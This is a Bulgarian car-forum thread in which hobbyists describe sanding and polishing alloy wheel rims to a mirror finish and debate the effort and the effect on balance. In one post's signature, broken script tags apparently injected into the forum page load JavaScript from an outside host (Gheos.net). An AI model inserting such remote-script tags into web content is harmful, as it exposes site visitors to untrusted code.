P.S. Носи си и работни дрехи.
реставрация на джанти
Започната от alipi, 14 юни 2010 - 18:50:50
39 мнения по тази тема
Публикувано 18 юни 2010 - 23:11
Илийка,няма да свалям цялата боя.Джантите на са боядисани целите.Това което се вижда на лицевата страна не е чиста боя,това е просто разсейка от омарата понеже праховото боядисване е на голяма мъгла,ако може така да се каже.Боя,плътна перла има само в малките петохуйници и дупките за болтовете,отсрани и отзад е специална основа.Това което виждаш като боя отпред на челото на джантата трябва да се свали.Просто няма начин да не попадне по челото.Ще се шлайфа от шкурка Р80 после Р120 и т.н. докато стигна Р2500 водно.после със специална паста и кече сложено на бормашина се полира до огледален блясък чистия алуминий,след това се лакира за да се запечати както си бяха оригинално.Дано този път да си ме разбрал правилно.Ако искаш и имаш време заповядай вкъщи да пиеме по един сок и да видиш на място за какво става въпрос.
Не хапи този,който може да те изяде.
Публикувано 19 юни 2010 - 00:48
Колега полирането е много гадна работа, честно.. аз си изтърках ръцете и на никъде не съм след песъкоструйката, нз при тебе с какъв пясък са ти ги минавали, аз уж доплатих за някъв по скъп дето не дерял толкова ама.. няма такива работи, дупките са брутално дълбоки, сигурно 20 часа съм се занимавал само с едната от джантите и е мн далече работата от огледална.. Ето малко снимки да видиш за какво става въпрос, тая джанта е търкана на ръка със 150-400-600-800-1200-2000 и после полирпаста.. Борда е лесна работа, можеш да качиш джантата на колата врътваш я и заспиваш докато се върти джантата през шкурката, ама лъчите са ташак работа, те твоите са с доста по проста форма от моите и сигурно по лесно ще станат.. Ако измислиш някой по лесен начин за полиране да кажеш че не мен ми се разказа играта и в крайна сметка май ще ги нося да ми ги боядисат.. За полиране на борд 50лв няма да дам, те за моите ще искат сигурно по 200-300 на джанта за всичко.. Снимките са преди да се свали боята, и след това е вече крайния резултат с джантата която съм търкал най мн.. снимки след песъкоструйката нямам..

Follow your own star...
Публикувано 19 юни 2010 - 10:42
Рамбо, те твоите са ужасни за полиране с тези ъгли. Алипи има само ъгъла на плочата спрямо борда.
Иначе не е като да не може... ама те за това си струват 50лв. на борд полирането.
Един познат и той се е хванал да го прави това...
Трябва да ви кажа, че искрено ви се радвам на ентусиазма. До преди няколко години, грижите за колите бяха някак посредствени... сега става все по-маниащина
Иначе не е като да не може... ама те за това си струват 50лв. на борд полирането.
Един познат и той се е хванал да го прави това...
Трябва да ви кажа, че искрено ви се радвам на ентусиазма. До преди няколко години, грижите за колите бяха някак посредствени... сега става все по-маниащина
Прикачени файлове
Публикувано 19 юни 2010 - 11:23
Замисли се колко неравности целиш по пътя (някои при това ги уцелваш с висока скорост), някои ги целиш странично. После се замисли дали твоят приятел не е поредният експерт "на маса"... после се замисли и ти по въпроса и прецени колко грама метал ще свалиш по този начин.Aйде и аз да кажа нещо по случая.Като си търках моите джанти след песъкоструя с цел отстраняване на надрано,един приятел ми разправяше, че можело да разваля заводския баланс на джантите пък те си бяха перфектно прави
.
След това като сложиш гумата върху джантата, пак трябва да се балансира... Ужас... ми тя вече няма перфектен заводски баланс
Публикувано 19 юни 2010 - 13:20
Айде на снимките.
За днес стига толкова.Като почнете от първата снимка та до последната:шкурки Р60/Р120/Р180.
Заваля иначе мислех поне до Р400 да я докарам.Това е само една джанта,от 9:00ч. до сега,с почивки за цигари,да починат машинките малко.Остават шкурки Р240/Р400/Р500/Р800/Р1000/Р1500/Р2000/Р2500.
Кой се беше изказал че праховото не държи.Да дойде аз ще му давам по 30лв. надница да търка да види колко не държи тая боя.
За сега толкова утре пак.Направо ми се опути пу...а.
За днес стига толкова.Като почнете от първата снимка та до последната:шкурки Р60/Р120/Р180.
Заваля иначе мислех поне до Р400 да я докарам.Това е само една джанта,от 9:00ч. до сега,с почивки за цигари,да починат машинките малко.Остават шкурки Р240/Р400/Р500/Р800/Р1000/Р1500/Р2000/Р2500.
Кой се беше изказал че праховото не държи.Да дойде аз ще му давам по 30лв. надница да търка да види колко не държи тая боя.
За сега толкова утре пак.Направо ми се опути пу...а.
Прикачени файлове
Публикувано 19 юни 2010 - 14:31
Какви машини ползваш за търкането?
Follow your own star...
Публикувано 19 юни 2010 - 17:50
Едната машина се вижда на снимката ,а другата е най обикновенна бормашина с телена четка.Естественно повечко желание и търпение.Много е трудно направо останах без ръце,но почва да се вижда вече за какво става въпрос.
Публикувано 19 юни 2010 - 18:16
много се кефя на резултатете които сте постегнали и на огромното ви желание и труд който хвърляте. дано имате проверени и доказани гумаджии , че после псуването ще е правопропорционално на положеното време за труд.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
Публикувано 02 октомври 2010 - 16:58
Ако си задаваш въпроса "струва ли си да ремонтирам стария Мерцедес", по-добре го продай и си купи чисто ново Пежо, Мерцедес не е твоята марка!
• Бабини деветини • clk.babailiica.com • наргиле •
Публикувано 02 октомври 2010 - 17:42
Евала Павка....Резултата е оправдал усилието.
Ти си звяр бе колега
Ти си звяр бе колега

Проконтролирай деструктивността на стремежите си..да помислим заедно над крайността....и да отворим по бира....живеем заедно, умираме сами, нали?
Публикувано 02 октомври 2010 - 21:08
Не е това финалния резултат нали?
Публикувано 03 октомври 2010 - 10:07
Не, това е 
Ignore list: fiveq, Наско, krasch
Публикувано 03 октомври 2010 - 11:32
И аз така си помислих
Публикувано 03 октомври 2010 - 19:01
Крайният резултат е доста блестящ! качете снимки как стоят на колата да оплакнем окото
M112.940 inside
0 потребител(и) четат тази тема
0 потребители, 0 гости, 0 анонимни

Виж ГАРАЖА